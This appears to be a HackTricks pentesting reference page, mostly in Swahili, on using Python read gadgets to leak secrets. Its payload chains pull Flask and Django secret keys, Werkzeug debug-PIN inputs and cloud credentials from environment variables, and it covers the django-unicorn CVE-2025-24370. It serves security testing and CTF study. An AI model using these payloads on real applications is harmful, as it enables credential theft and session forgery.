Vifaa vya Kusoma vya Ndani vya Python

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

Udhaifu mbalimbali kama Python Format Strings au Class Pollution zinaweza kukuruhusu kusoma data za ndani za python lakini hazitaturuhusu kuendesha code. Kwa hiyo, pentester atahitaji kutumia vizuri vibali hivi vya kusoma ili kupata vibali nyeti na kuongeza kiwango cha udhaifu.

Flask - Soma ufunguo wa siri

Ukurasa mkuu wa programu ya Flask huenda ukawa na global object app ambako ufunguo wa siri umewekwa.

app = Flask(__name__, template_folder='templates')
app.secret_key = '(:secret:)'

Katika kesi hii inawezekana kufikia kitu hiki kwa kutumia gadget yoyote tu ili access global objects kutoka kwenye Bypass Python sandboxes page.

Katika kesi ambapo udhaifu uko katika faili tofauti ya python, unahitaji gadget kuvuka faili ili kufikia faili kuu ili access the global object app.secret_key kubadilisha Flask secret key na kuwa na uwezo wa escalate privileges knowing this key.

Payload kama hii from this writeup:

__init__.__globals__.__loader__.__init__.__globals__.sys.modules.__main__.app.secret_key

Tumia payload hii ili kubadilisha app.secret_key (jina katika app yako linaweza kuwa tofauti) ili uweze kusaini flask cookies mpya zenye ruhusa zaidi.

Werkzeug - machine_id na node uuid

Using these payload from this writeup utaweza kupata machine_id na nodi ya uuid, ambazo ni siri kuu unazohitaji ili generate the Werkzeug pin unaweza kutumia kufikia python console katika /console ikiwa debug mode imewezeshwa:

{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug]._machine_id}
{ua.__class__.__init__.__globals__[t].sys.modules[werkzeug.debug].uuid._node}

Warning

Kumbuka kuwa unaweza kupata njia ya ndani ya server kwa app.py kwa kusababisha baadhi ya makosa kwenye ukurasa wa wavuti ambayo itakupa njia.

If the vulnerability is in a different python file, check the previous Flask trick to access the objects from the main python file.

Django - SECRET_KEY and settings module

Object ya settings ya Django imehifadhiwa kwenye sys.modules mara tu application inapozinduliwa. Kwa primitives za kusoma pekee unaweza leak SECRET_KEY, database credentials au signing salts:

# When DJANGO_SETTINGS_MODULE is set (usual case)
sys.modules[os.environ['DJANGO_SETTINGS_MODULE']].SECRET_KEY

# Through the global settings proxy
a = sys.modules['django.conf'].settings
(a.SECRET_KEY, a.DATABASES, a.SIGNING_BACKEND)

Ikiwa vulnerable gadget iko katika module nyingine, walk globals kwanza:

__init__.__globals__['sys'].modules['django.conf'].settings.SECRET_KEY

Mara tu key itakapojulikana unaweza kutengeneza Django signed cookies au tokens kwa njia inayofanana na Flask.

Environment variables / cloud creds kupitia modules zilizopakuliwa

Jails nyingi bado huimport os au sys mahali fulani. Unaweza kutumia vibaya function yoyote inayoweza kufikiwa __init__.__globals__ ili kupiga pivot hadi module ya os ambayo tayari imeimportiwa na ku-dump environment variables zenye API tokens, cloud keys au flags:

# Classic os._wrap_close subclass index may change per version
cls = [c for c in object.__subclasses__() if 'os._wrap_close' in str(c)][0]
cls.__init__.__globals__['os'].environ['AWS_SECRET_ACCESS_KEY']

Ikiwa index ya subclass imechujwa, tumia loaders:

__loader__.__init__.__globals__['sys'].modules['os'].environ['FLAG']

Environment variables mara nyingi ndio secrets pekee zinazohitajika kusonga kutoka read hadi full compromise (cloud IAM keys, database URLs, signing keys, etc.).

Django-Unicorn class pollution (CVE-2025-24370)

django-unicorn (<0.62.0) iliruhusu class pollution kupitia crafted component requests. Kuweka property path kama __init__.__globals__ kumruhusu mshambuliaji kufikia component module globals na modules yoyote zilizo imported (e.g. settings, os, sys). Kutoka huko unaweza leak SECRET_KEY, DATABASES au service credentials bila code execution. The exploit chain ni purely read-based na inatumia same dunder-gadget patterns kama hapo juu.

Gadget collections for chaining

Recent CTFs (e.g. jailCTF 2025) zinaonyesha reliable read chains zilizojengwa tu kwa attribute access na subclass enumeration. Community-maintained lists such as pyjailbreaker zinakatalogia mamia ya minimal gadgets unaweza kuziunganisha ili kuvuka kutoka objects hadi __globals__, sys.modules na hatimaye sensitive data. Zitumie kujirekebisha haraka wakati indices au class names zinatofautiana kati ya Python minor versions.

References

• Wiz analysis of django-unicorn class pollution (CVE-2025-24370)
• pyjailbreaker – Python sandbox gadget wiki

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.